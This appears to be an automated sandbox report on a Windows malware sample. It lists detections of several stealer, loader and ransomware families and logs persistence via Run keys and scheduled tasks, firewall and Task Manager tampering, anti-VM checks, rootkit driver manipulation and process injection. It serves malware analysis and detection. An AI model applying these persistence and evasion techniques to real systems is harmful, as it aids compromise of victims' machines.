Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f12340f9-b0e6-42e3-a341-afc21e6d6dfd\\9B28.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\9B28.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

Rhadamanthys

stealer rhadamanthys

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3352 created 2572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe C:\Windows\system32\sihost.exe

Vidar

stealer vidar

ZGRat

rat zgrat

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9B28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9B28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\611E.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation C:\containerProviderhost\runtimenetSvc.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DBD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5343.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f12340f9-b0e6-42e3-a341-afc21e6d6dfd\\9B28.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\9B28.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Windows Media Player\Media Renderer\886983d96e3d3e C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files\Windows Mail\fontdrvhost.exe C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files\Windows Mail\5b884080fd4f94 C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\csrss.exe C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\886983d96e3d3e C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files\Windows Media Player\Media Renderer\csrss.exe C:\containerProviderhost\runtimenetSvc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-572 = "China Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2872 = "Magallanes Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2632 = "Norfolk Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\611E.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000_Classes\Local Settings C:\containerProviderhost\runtimenetSvc.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\containerProviderhost\runtimenetSvc.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\csrss.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3444 wrote to memory of 3640 N/A N/A C:\Windows\system32\cmd.exe
PID 3444 wrote to memory of 3640 N/A N/A C:\Windows\system32\cmd.exe
PID 3640 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3640 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3444 wrote to memory of 4760 N/A N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 3444 wrote to memory of 4760 N/A N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 3444 wrote to memory of 4760 N/A N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
